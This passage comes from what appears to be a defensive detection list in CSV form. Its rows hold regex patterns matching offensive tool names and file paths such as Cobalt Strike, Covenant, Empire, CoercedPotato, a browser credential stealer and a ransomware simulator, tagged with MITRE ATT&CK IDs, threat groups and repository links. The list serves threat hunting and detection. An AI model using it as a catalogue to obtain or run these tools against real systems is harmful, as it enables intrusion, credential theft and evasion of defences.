- FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","38550"
"*cobaltstrike*",".{0,1000}cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike binary for windows - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations. these assessments benefit security operations and incident response.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38551"
"*cobalt-strike*",".{0,1000}cobalt\-strike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38552"
"*cobaltstrike.store*",".{0,1000}cobaltstrike\.store.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","38554"
"*Cobalt-Strike/bof_template*",".{0,1000}Cobalt\-Strike\/bof_template.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","38555"
"*cobaltstrike-dist.tgz*",".{0,1000}cobaltstrike\-dist\.tgz.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","38556"
"*cobaltstrike-nemesis-connector*",".{0,1000}cobaltstrike\-nemesis\-connector.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","38557"
"*CobblePot59/ADcheck*",".{0,1000}CobblePot59\/ADcheck.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","38558"
"*cobbr/Covenant*",".{0,1000}cobbr\/Covenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38559"
"*cobbr/Elite*",".{0,1000}cobbr\/Elite.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38560"
"*cobbr/PSAmsi*",".{0,1000}cobbr\/PSAmsi.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","38561"
"*cobbr/SharpSploit*",".{0,1000}cobbr\/SharpSploit.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","38562"
"*code_execution/*.dll*",".{0,1000}code_execution\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38567"
"*code_execution/*.exe*",".{0,1000}code_execution\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38568"
"*code_execution/*.ps1*",".{0,1000}code_execution\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38569"
"*Coded by LimerBoy <3*",".{0,1000}Coded\sby\sLimerBoy\s\<3.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","38570"
"*coded by PlayBit*",".{0,1000}coded\sby\sPlayBit.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","38571"
"*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*",".{0,1000}CodeExec\-D37DA402\-3829\-492F\-90D0\-8EC3909514EB\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","38572"
"*Codejock Software/Xtreme Toolkit Pro*",".{0,1000}Codejock\sSoftware\/Xtreme\sToolkit\sPro.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","38573"
"*Codejock Software\Xtreme Toolkit Pro*",".{0,1000}Codejock\sSoftware\\Xtreme\sToolkit\sPro.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#registry","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","38574"
"*CodeLoad(shellcode)*",".{0,1000}CodeLoad\(shellcode\).{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","0","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","38575"
"*codeLoader/codeLoader.*",".{0,1000}codeLoader\/codeLoader\..{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","38577"
"*codesiddhant/jasmin-ransomware*",".{0,1000}codesiddhant\/jasmin\-ransomware.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","38578"
"*codewatchorg/bypasswaf*",".{0,1000}codewatchorg\/bypasswaf.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/codewatchorg/bypasswaf","1","1","N/A","network exploitation tool","N/A","4","331","104","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z","38579"
"*codewatchorg/sqlipy*",".{0,1000}codewatchorg\/sqlipy.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/codewatchorg/sqlipy","1","1","N/A","network exploitation tool","N/A","3","254","92","2024-06-19T23:38:41Z","2014-09-22T03:25:42Z","38580"
"*codewhitesec/apollon*",".{0,1000}codewhitesec\/apollon.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","38581"
"*codewhitesec/daphne*",".{0,1000}codewhitesec\/daphne.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","38582"
"*codewhitesec/Lastenzug*",".{0,1000}codewhitesec\/Lastenzug.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","1","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","38583"
"*coerce machine account authentication via MS-DFSNM NetrDfsRemoveStdRoot()*",".{0,1000}coerce\smachine\saccount\sauthentication\svia\sMS\-DFSNM\sNetrDfsRemoveStdRoot\(\).{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","0","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","38584"
"*CoercedPotato spawn *",".{0,1000}CoercedPotato\sspawn\s.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","38585"
"*CoercedPotato.cpp*",".{0,1000}CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","38586"
"*CoercedPotato.exe*",".{0,1000}CoercedPotato\.exe.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","38587"
"*CoercedPotato.exe*",".{0,1000}CoercedPotato\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","38588"
"*CoercedPotato.sln*",".{0,1000}CoercedPotato\.sln.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","38589"
"*CoercedPotato-master*",".{0,1000}CoercedPotato\-master.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","38590"
